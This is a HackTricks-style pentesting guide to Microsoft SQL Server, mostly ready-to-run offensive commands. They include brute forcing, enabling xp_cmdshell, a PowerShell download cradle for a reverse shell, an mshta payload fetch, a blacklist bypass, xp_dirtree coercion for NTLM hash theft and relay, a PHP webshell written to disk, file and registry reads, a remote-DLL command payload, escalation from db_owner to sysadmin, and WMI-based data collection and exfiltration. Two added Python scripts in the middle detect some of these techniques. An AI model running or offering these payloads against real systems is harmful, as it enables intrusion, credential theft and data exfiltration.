# 1433 - Pentesting MSSQL - Microsoft SQL Server
> **Tip**
>
> Learn and practice AWS hacking: HackTricks Training AWS Red Team Expert (ARTE)
> Learn and practice GCP hacking: HackTricks Training GCP Red Team Expert (GRTE)
> Learn and practice Azure hacking: HackTricks Training Azure Red Team Expert (AzRTE)
>
> **Support HackTricks**
>
> - Check the subscription plans!
> - Join the 💬 Discord group or the Telegram group, or follow us on Twitter 🐦 @hacktricks_live.
> - Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud GitHub repos.
## Basic Information

From wikipedia:

Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product whose primary function is to store and retrieve data as requested by other software applications, which may run either on the same computer or on another computer across a network (including the Internet).

**Default port:** 1433

```
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
```
### In hosted Database-as-a-Service (DBaaS) environments

Everything that depends on "owning the host" (e.g., privilege escalation, lateral movement, and OS command execution) ceases to exist in DBaaS. Pentesting in these environments must pivot to application-layer exploitation, data exfiltration via SQL logic, misconfigured IAM roles, or poor network/VPC design. For example, the Amazon RDS documentation explicitly states that xp_cmdshell and the TRUSTWORTHY database property are not supported.

> **Warning:** what you get is a database endpoint, not a server. The cloud provider manages the host OS, the database engine binaries and many of the security policies.
### Default MS-SQL System Tables

- **master Database**: this database is crucial because it records all the system-level details of the SQL Server instance.
- **msdb Database**: SQL Server Agent uses this database to manage the scheduling of alerts and jobs.
- **model Database**: acts as the template for every new database on the SQL Server instance; any change such as size, collation or recovery model is reflected in newly created databases.
- **Resource Database**: a read-only database that holds the system objects shipped with SQL Server. Although these objects are physically stored in the Resource database, they are logically presented in the sys schema of every database.
- **tempdb Database**: serves as temporary storage for transient objects or intermediate result sets.
## Enumeration

### Automatic Enumeration

If you know nothing about the service:

```bash
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
msf> use auxiliary/scanner/mssql/mssql_ping
```

> **Tip:** if you don't have credentials you can try to guess them. You can use nmap or metasploit. Be careful: you may block accounts if you fail to log in several times using an existing username.
### Metasploit (needs creds)

```bash
#Set USERNAME, RHOSTS and PASSWORD
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used

#Steal NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder

#Info gathering
msf> use admin/mssql/mssql_enum #Security checks
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

#Search for interesting data
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf

#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin

#Code execution
msf> use admin/mssql/mssql_exec #Execute commands
msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload

#Add new admin user from meterpreter session
msf> use windows/manage/mssql_local_auth_bypass
```
### Brute force

#### User Enumeration via RID Brute Force

You can enumerate domain users by brute-forcing RIDs (Relative Identifiers) through MSSQL. This technique is useful when you have valid credentials but limited privileges:

```bash
# Using NetExec (nxc) - formerly CrackMapExec
nxc mssql <IP> --local-auth -u <username> -p '<password>' --rid-brute 5000

# Examples:
nxc mssql 10.129.234.50 --local-auth -u sqlguest -p 'zDPBpaF4FywlqIv11vii' --rid-brute 5000
nxc mssql 10.10.10.59 -u sa -p 'P@ssw0rd' --rid-brute 10000

# Without --local-auth for domain accounts
nxc mssql 10.10.10.59 -u DOMAIN\\user -p 'password' --rid-brute 5000
```

Example output:

```
MSSQL 10.129.234.50 1433 DC 1104: REDELEGATE\Christine.Flanders
MSSQL 10.129.234.50 1433 DC 1105: REDELEGATE\Marie.Curie
MSSQL 10.129.234.50 1433 DC 1106: REDELEGATE\Helen.Frost
MSSQL 10.129.234.50 1433 DC 1107: REDELEGATE\Michael.Pontiac
MSSQL 10.129.234.50 1433 DC 1108: REDELEGATE\Mallory.Roberts
MSSQL 10.129.234.50 1433 DC 1109: REDELEGATE\James.Dinkleberg
```

Parameters:

- `--local-auth`: use local authentication instead of domain authentication
- `--rid-brute <max_rid>`: brute-force RIDs up to the given number (default: 4000)
- `-u`: username
- `-p`: password

This technique enumerates users by querying the MSSQL server for the account information associated with consecutive RIDs.
### Manual Enumeration

#### Login

```bash
# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt

# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt

# Bruteforce using tickets against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt

# Bruteforce using passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt

# Bruteforce using hashes against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt

# Using Impacket mssqlclient.py
mssqlclient.py [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
## Recommended: -windows-auth when you are going to use a domain. Use the NetBIOS name of the machine as the domain
mssqlclient.py [-db volume] -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>

# Using sqsh
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
## In case of Windows Auth, use "." as domain name for a local user
sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
## In sqsh you need to use GO after writing the query to send it
1> select 1;
2> go
```
#### Common Enumeration

```sql
-- Get version
select @@version;
-- Get user
select user_name();
-- Get databases
SELECT name FROM master.dbo.sysdatabases;
-- Use database
USE master

-- Get table names
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
-- List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
-- List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
-- Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
EXEC sp_addsrvrolemember 'hacker', 'sysadmin'

-- Enumerate links (mssqlpwner / mssqlclient helper command)
enum_links
-- Use a link
use_link [NAME]
```
#### Get Users

```sql
-- Get all the users and roles
select * from sys.database_principals;
-- This query filters the results a bit
select name,
       create_date,
       modify_date,
       type_desc as type,
       authentication_type_desc as authentication_type,
       sid
from sys.database_principals
where type not in ('A', 'R')
order by name;

-- Both of these select all the users of the current database (not the server).
-- Interesting when you cannot access the table sys.database_principals
EXEC sp_helpuser
SELECT * FROM sysusers
```
#### Get Permissions

- **Securable**: defined as the resources managed by SQL Server for access control. These are categorized into:
  - Server – examples include databases, logins, endpoints, availability groups and server roles.
  - Database – examples cover database roles, application roles, schemas, certificates, full text catalogs and users.
  - Schema – includes tables, views, procedures, functions, synonyms, etc.
- **Permission**: associated with SQL Server securables, permissions such as ALTER, CONTROL and CREATE can be granted to a principal. Management of permissions occurs at two levels:
  - Server Level using logins
  - Database Level using users
- **Principal**: this term refers to the entity that is granted permission to a securable. Principals mainly include logins and database users. Access control over securables is exercised by granting or denying permissions, or by including logins and users in roles that hold access rights.

```sql
-- Show all different securables names
SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
-- Show all possible permissions in MSSQL
SELECT * FROM sys.fn_builtin_permissions(DEFAULT);
-- Get all my permissions over securable type SERVER
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
-- Get all my permissions over a database
USE <database>
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
-- Get members of the role "sysadmin"
Use master
EXEC sp_helpsrvrolemember 'sysadmin';
-- Get if the current user is sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
-- Get users that can run xp_cmdshell
Use master
EXEC sp_helprotect 'xp_cmdshell'
```
## Tricks

### Execute OS Commands

> **Caution:** note that in order to execute commands it's not only necessary to have xp_cmdshell enabled, but also to have the EXECUTE permission on the xp_cmdshell stored procedure. You can get who (apart from sysadmins) can use xp_cmdshell with:
>
> ```sql
> Use master
> EXEC sp_helprotect 'xp_cmdshell'
> ```

```bash
# Username + Password + CMD command
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'
```

```sql
-- Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
-- This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
-- This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
-- One liner
EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

-- Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
-- Get Rev shell
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'
-- Bypass a blacklisted "EXEC xp_cmdshell" (the procedure name is passed through a variable)
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' --
```

```bash
# Executing custom assembly on the current server with windows authentication and executing hostname command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname

# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname

# Executing the hostname command using stored procedures on the linked SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname

# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
```
### WMI-based remote SQL collection (sqlcmd + CSV export)

Operators can pivot from the IIS/app tier to SQL servers and use WMI to execute a small batch file that authenticates to MSSQL, runs an ad-hoc query and exports the results to CSV. This keeps collection simple and blends in with admin activity.

Example mssq.bat:

```batch
@echo off
rem Usage: mssq.bat <server> <user> <pass> <"SQL"> <out.csv>
set S=%1
set U=%2
set P=%3
set Q=%4
set O=%5
rem Remove headers, trim trailing spaces, CSV separator = comma
sqlcmd -S %S% -U %U% -P %P% -Q "SET NOCOUNT ON; %Q%" -W -h -1 -s "," -o "%O%"
```

Invoke it remotely via WMI:

```bash
wmic /node:SQLHOST /user:DOMAIN\user /password:Passw0rd! process call create "cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd \"SELECT TOP(100) name FROM sys.tables\" C:\\Windows\\Temp\\out.csv"
```

PowerShell alternative:

```powershell
$cmd = 'cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd "SELECT name FROM sys.databases" C:\\Windows\\Temp\\dbs.csv'
Invoke-WmiMethod -ComputerName SQLHOST -Class Win32_Process -Name Create -ArgumentList $cmd
```

Notes:

- sqlcmd may be missing; fall back to osql, PowerShell Invoke-Sqlcmd, or a one-liner using System.Data.SqlClient.
- Mind the quoting; longer or more complex queries are easier to supply from a file, or as a Base64-encoded argument that the batch/PowerShell stub decodes.
- Exfiltrate the CSV over SMB (e.g. copy it from \\SQLHOST\C$\Windows\Temp) or compress it and move it through the C2.
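From the defender's side, the chain above (WmiPrvSE.exe spawning a shell, then sqlcmd with a SQL login on the command line writing a result file into a staging directory) is what process-creation telemetry shows. The following script is an added example, not part of the original page or of the Unit 42 research it summarises: it runs two rules over constructed Sysmon-style Event ID 1 records and correlates them by host and time. The field names, the staging-directory list, the `sqlcmd.exe` install path and the five-minute window are assumptions for this example.

```python
"""Flag WMI-launched sqlcmd collection in process-creation telemetry.

Events are modelled on Sysmon Event ID 1 fields (UtcTime, Computer, User,
Image, ParentImage, CommandLine). The event sample below is constructed
for this example and mirrors the batch/WMI chain described above."""
import re
from datetime import datetime, timedelta

WMI_HOST = "wmiprvse.exe"               # WMI provider host: parent of remotely created processes
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SQL_CLIENTS = {"sqlcmd.exe", "osql.exe"}
# Staging locations where a query result file has no business being written (assumed list).
STAGING_DIRS = ("\\windows\\temp\\", "\\appdata\\local\\temp\\", "\\programdata\\")
TOKEN_RE = re.compile(r'"[^"]*"|\S+')   # split a command line on whitespace, honouring quotes


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def sqlcmd_flags(cmdline):
    """Map single-letter sqlcmd/osql flags to their argument ('-o file' -> {'o': 'file'})."""
    parts = [t.strip('"') for t in TOKEN_RE.findall(cmdline)]
    flags = {}
    for i, p in enumerate(parts[:-1]):
        if len(p) == 2 and p[0] == "-":
            flags[p[1]] = parts[i + 1]
    return flags


def analyse(events, window=timedelta(minutes=5)):
    """Return (rule, computer, user, command_line) findings."""
    findings, wmi_spawns = [], []
    for e in sorted(events, key=lambda ev: ev["UtcTime"]):
        t = datetime.strptime(e["UtcTime"], "%Y-%m-%d %H:%M:%S")
        img, parent = basename(e["Image"]), basename(e["ParentImage"])
        if parent == WMI_HOST and img in SHELLS:
            # A shell started by the WMI provider host: remote process creation.
            wmi_spawns.append((e["Computer"], t))
            findings.append(("wmi_spawned_shell", e["Computer"], e["User"], e["CommandLine"]))
        if img in SQL_CLIENTS:
            flags = sqlcmd_flags(e["CommandLine"])
            out = flags.get("o", "").lower()
            if "U" in flags and any(d in out for d in STAGING_DIRS):
                # SQL login on the command line plus an output file in a staging directory.
                recent_wmi = any(c == e["Computer"] and timedelta(0) <= t - ts <= window
                                 for c, ts in wmi_spawns)
                rule = "wmi_driven_sql_collection" if recent_wmi else "sqlcmd_export_to_staging"
                findings.append((rule, e["Computer"], e["User"], e["CommandLine"]))
    return findings


# Constructed sample: the WMI chain on SQLHOST, and a benign interactive DBA on ADMINWS.
SAMPLE_EVENTS = [
    {"UtcTime": "2024-01-01 10:00:00", "Computer": "SQLHOST", "User": "DOMAIN\\user",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": 'cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd '
                    '"SELECT TOP(100) name FROM sys.tables" C:\\Windows\\Temp\\out.csv'},
    {"UtcTime": "2024-01-01 10:00:01", "Computer": "SQLHOST", "User": "DOMAIN\\user",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn\\sqlcmd.exe",
     "CommandLine": 'sqlcmd -S 10.0.0.5 -U sa -P P@ssw0rd -Q "SET NOCOUNT ON; SELECT TOP(100) name '
                    'FROM sys.tables" -W -h -1 -s "," -o "C:\\Windows\\Temp\\out.csv"'},
    # Windows auth (-E), no output file: should not fire.
    {"UtcTime": "2024-01-01 10:02:00", "Computer": "ADMINWS", "User": "DOMAIN\\dba",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn\\sqlcmd.exe",
     "CommandLine": 'sqlcmd -S dbsrv -E -Q "SELECT name FROM sys.databases"'},
]

if __name__ == "__main__":
    for rule, computer, user, cmd in analyse(SAMPLE_EVENTS):
        print(f"[{rule}] {computer} {user}: {cmd}")
```

Because the query is hidden inside the batch file, a flat event stream never shows `WmiPrvSE.exe` as the grandparent of `sqlcmd.exe`; the script therefore correlates the WMI-spawned shell with the later sqlcmd export on the same host instead of relying on the parent chain. A batch file sitting in `C:\Windows\Temp` that is invoked by a WMI-created process is itself worth a rule of its own.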
### Get hashed passwords

```sql
SELECT * FROM master.sys.syslogins;
```
### Steal NetNTLM hash / Relay attack

You should start an SMB server to capture the hash used in the authentication (impacket-smbserver or responder for example).

```sql
xp_dirtree '\\<attacker_IP>\any\thing'
exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
EXEC master..xp_subdirs '\\<attacker_IP>\anything\'
EXEC master..xp_fileexist '\\<attacker_IP>\anything\'
```

```bash
# Capture hash
sudo responder -I tun0
sudo impacket-smbserver share ./ -smb2support
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer

# Issuing NTLM relay attack on the SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on the local server with custom command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250
```

> **Warning:** you can check who (apart from sysadmins) has permissions to run those MSSQL functions with:
>
> ```sql
> Use master; EXEC sp_helprotect 'xp_dirtree'; EXEC sp_helprotect 'xp_subdirs'; EXEC sp_helprotect 'xp_fileexist';
> ```

Using tools such as responder or Inveigh it's possible to steal the NetNTLM hash. You can see how to use these tools in:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
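The xp_cmdshell enablement, the "EXEC @x" indirection around a blacklisted procedure name, the xp_dirtree/xp_subdirs/xp_fileexist UNC coercion and the RID brute force earlier on this page all leave traces in the statements a SQL Server Audit or Extended Events session captures, and in the ERRORLOG. The script below is an added example and not part of the original page: it runs detection rules over a constructed set of such statements and error-log lines. Assumptions made for the example: the event shape (timestamp, session id, login, statement text), the UNC host allowlist, the RID-burst threshold, and that RID brute-forcing tools resolve RIDs through `SUSER_SNAME(SID_BINARY(...))` lookups; the error-log message text is the one SQL Server writes when `sp_configure` changes an option.

```python
"""Detection rules for MSSQL abuse patterns over captured T-SQL statements.

Input records mimic what a SQL Server Audit / Extended Events session
delivers (statement text, login, session id, timestamp). Every event and
log line below is constructed for this example."""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# sp_configure options whose activation should always be reviewed.
SENSITIVE_OPTIONS = {"xp_cmdshell", "ole automation procedures", "clr enabled",
                     "external scripts enabled", "show advanced options"}
# Hosts the SQL Server is expected to reach over UNC (constructed allowlist).
UNC_ALLOWLIST = {"backup01"}

SP_CONFIGURE_RE = re.compile(r"sp_configure\s+'([^']+)'\s*,\s*'?(\d+)'?", re.I)
CMDSHELL_RE = re.compile(r"\bxp_cmdshell\b", re.I)
# xp_dirtree/xp_subdirs/xp_fileexist followed by a UNC path: capture the host.
UNC_XP_RE = re.compile(r"\b(xp_dirtree|xp_subdirs|xp_fileexist)\b[^']*'\\\\([^\\']+)", re.I)
# RID-to-name lookups as issued by RID brute-forcing tools (assumed pattern).
SUSER_SID_RE = re.compile(r"SUSER_SNAME\s*\(\s*SID_BINARY", re.I)
# ERRORLOG line written when a configuration option changes.
ERRORLOG_RE = re.compile(r"Configuration option '([^']+)' changed from (\d) to (\d)")


@dataclass
class Event:
    ts: datetime
    session: int
    login: str
    text: str


def detect(events, rid_threshold=20, rid_window=timedelta(seconds=60)):
    """Return (rule, login, detail) findings for a list of Event records."""
    findings = []
    sid_calls = defaultdict(list)
    for e in events:
        configured = False
        for m in SP_CONFIGURE_RE.finditer(e.text):
            configured = True
            if m.group(1).lower() in SENSITIVE_OPTIONS and m.group(2) != "0":
                findings.append(("sensitive_option_enabled", e.login, m.group(1)))
        # Match the procedure name anywhere in the statement, not only after EXEC:
        # the "DECLARE @x='xp_cmdshell'; EXEC @x" indirection still carries the
        # name as a string literal.
        if not configured and CMDSHELL_RE.search(e.text):
            findings.append(("xp_cmdshell_reference", e.login, e.text.strip()))
        m = UNC_XP_RE.search(e.text)
        if m and m.group(2).lower() not in UNC_ALLOWLIST:
            findings.append(("unc_auth_coercion", e.login, f"{m.group(1)} -> \\\\{m.group(2)}"))
        if SUSER_SID_RE.search(e.text):
            sid_calls[(e.session, e.login)].append(e.ts)
    # A burst of SID lookups from one session is the RID brute-force pattern.
    for (session, login), stamps in sid_calls.items():
        stamps.sort()
        for i in range(len(stamps) - rid_threshold + 1):
            if stamps[i + rid_threshold - 1] - stamps[i] <= rid_window:
                findings.append(("rid_bruteforce", login,
                                 f"session {session}: {len(stamps)} SUSER_SNAME(SID_BINARY) calls"))
                break
    return findings


def errorlog_findings(lines):
    """Sensitive options switched on according to SQL Server ERRORLOG lines."""
    hits = []
    for line in lines:
        m = ERRORLOG_RE.search(line)
        if m and m.group(1).lower() in SENSITIVE_OPTIONS and m.group(3) == "1":
            hits.append(m.group(1))
    return hits


T0 = datetime(2024, 1, 1, 12, 0, 0)
SAMPLE_EVENTS = [
    Event(T0, 55, "webapp", "EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; "
                            "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"),
    Event(T0 + timedelta(seconds=5), 55, "webapp",
          "DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'whoami'"),
    Event(T0 + timedelta(seconds=9), 55, "webapp",
          "exec master.dbo.xp_dirtree '\\\\10.10.14.5\\any\\thing'"),
    Event(T0 + timedelta(seconds=12), 61, "svc_backup",
          "EXEC master..xp_dirtree '\\\\backup01\\sqlbackups\\'"),       # allowlisted host
    Event(T0 + timedelta(seconds=20), 70, "reporting", "SELECT name FROM sys.databases"),
] + [
    Event(T0 + timedelta(seconds=30 + i), 58, "sqlguest",
          f"SELECT SUSER_SNAME(SID_BINARY(N'S-1-5-21-1-2-3-{1000 + i}'))")
    for i in range(25)
]

SAMPLE_ERRORLOG = [
    "2024-01-01 12:00:00.10 spid55 Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-01-01 12:00:00.12 spid55 Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-01-01 12:03:10.00 spid61 Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.",
]

if __name__ == "__main__":
    for rule, login, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {login}: {detail}")
    print("ERRORLOG enabled:", errorlog_findings(SAMPLE_ERRORLOG))
```

The string rules are deliberately simple: a procedure name assembled at runtime (for example from `CHAR()` calls) would not match `CMDSHELL_RE`, so where a server audit is available, key on the audited object name and the `SERVER_OBJECT_CHANGE` / configuration events rather than on statement text alone, and treat the ERRORLOG rule as the independent confirmation that the option really changed.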
### Abusing MSSQL trusted Links

Read this post to find more information about how to abuse this feature:
### Write Files

To write files using MSSQL we need to enable Ole Automation Procedures, which requires admin privileges, and then execute some stored procedures to create the file:

```sql
-- Enable Ole Automation Procedures
sp_configure 'show advanced options', 1
RECONFIGURE
sp_configure 'Ole Automation Procedures', 1
RECONFIGURE

-- Create a File
DECLARE @OLE INT
DECLARE @FileID INT
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE
```
### Read files with OPENROWSET

By default, MSSQL allows reading any file in the operating system to which the account has read access. We can use the following SQL query:

```sql
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
```

However, the BULK option requires the ADMINISTER BULK OPERATIONS or the ADMINISTER DATABASE BULK OPERATIONS permission.

```sql
-- Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTER BULK OPERATIONS' OR permission_name='ADMINISTER DATABASE BULK OPERATIONS';
```

Error-based vector for SQLi:

```
https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--
```
### RCE / Read files executing scripts (Python and R)

MSSQL may allow you to execute scripts in Python and/or R. This code will be executed by a different user than the one using xp_cmdshell to execute commands.

Example trying to execute an 'R' "Hello World!" that does not work:

(image: screenshot of the failing R "Hello World!" attempt)

Example using the configured Python to perform several actions:

```sql
-- Print the user being used (and execute commands)
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
-- Open and read a file
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
-- Multiline
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
import sys
print(sys.version)
'
GO
```
### Read Registry

Microsoft SQL Server provides multiple extended stored procedures that allow you to interact not only with the network but also with the file system and even the Windows Registry:

| Regular | Instance-Aware |
|---|---|
| sys.xp_regread | sys.xp_instance_regread |
| sys.xp_regenumvalues | sys.xp_instance_regenumvalues |
| sys.xp_regenumkeys | sys.xp_instance_regenumkeys |
| sys.xp_regwrite | sys.xp_instance_regwrite |
| sys.xp_regdeletevalue | sys.xp_instance_regdeletevalue |
| sys.xp_regdeletekey | sys.xp_instance_regdeletekey |
| sys.xp_regaddmultistring | sys.xp_instance_regaddmultistring |
| sys.xp_regremovemultistring | sys.xp_instance_regremovemultistring |

```sql
-- Example read registry
EXECUTE master.sys.xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Microsoft SQL Server\MSSQL12.SQL2014\SQLServerAgent', 'WorkingDirectory';
-- Example write and then read registry
EXECUTE master.sys.xp_instance_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue', 'REG_SZ', 'Now you see me!';
EXECUTE master.sys.xp_instance_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue';
-- Example to check who can use these functions
Use master;
EXEC sp_helprotect 'xp_regread';
EXEC sp_helprotect 'xp_regwrite';
```

For more examples check out the original source.
### RCE with MSSQL User Defined Function - SQLHttp

It is possible to load a .NET dll within MSSQL with custom functions. This, however, requires dbo access, so you need a connection to the database as sa or with an Administrator role.

Follow this link to see an example.

### RCE with autoadmin_task_agents

According to this post, it is also possible to load a remote dll and make MSSQL execute it in a similar way:

```sql
update autoadmin_task_agents set task_assembly_name = "class.dll", task_assembly_path="\\remote-server\\ping.dll",className="Class1.Class1";
```

```csharp
using Microsoft.SqlServer.SmartAdmin;
using System;
using System.Diagnostics;

namespace Class1
{
    public class Class1 : TaskAgent
    {
        // The command runs from the constructor, i.e. as soon as the assembly is instantiated
        public Class1()
        {
            Process process = new Process();
            process.StartInfo.FileName = "cmd.exe";
            process.StartInfo.Arguments = "/c ping localhost -t";
            process.StartInfo.UseShellExecute = false;
            process.StartInfo.RedirectStandardOutput = true;
            process.Start();
            process.WaitForExit();
        }

        // Remaining TaskAgent members are left empty; only the constructor matters here
        public override void DoWork()
        {
        }

        public override void ExternalJob(string command, LogBaseService jobLogger)
        {
        }

        public override void Start(IServicesFactory services)
        {
        }

        public override void Stop()
        {
        }

        public void Test()
        {
        }
    }
}
```
### Other ways for RCE

There are other methods to obtain command execution, such as adding extended stored procedures, CLR Assemblies, SQL Server Agent Jobs, and external scripts.
## MSSQL Privilege Escalation

### From db_owner to sysadmin

If a regular user is given the role db_owner over a database owned by an admin user (like sa) and that database is configured as trustworthy, that user can abuse these privileges to privesc, because stored procedures created in that database can execute as the owner (admin).

```sql
-- Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases
-- Find trustworthy databases
SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.name=b.name;
-- Get roles over the selected database (look for your username as db_owner)
USE <trustworthy_db>
SELECT rp.name as database_role, mp.name as database_user
from sys.database_role_members drm
join sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)

-- If you found you are db_owner of a trustworthy database, you can privesc:
--1. Create a stored procedure to add your user to sysadmin role
USE <trustworthy_db>
CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'USERNAME','sysadmin'

--2. Execute stored procedure to get sysadmin role
USE <trustworthy_db>
EXEC sp_elevate_me

--3. Verify your user is a sysadmin
SELECT is_srvrolemember('sysadmin')
```

You can use a metasploit module:

```bash
msf> use auxiliary/admin/mssql/mssql_escalate_dbowner
```

Or a PS script:

```powershell
# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-Dbowner.psm1
Import-Module .\Invoke-SqlServerDbElevateDbOwner.psm1
Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlServerInstance 10.2.2.184
```
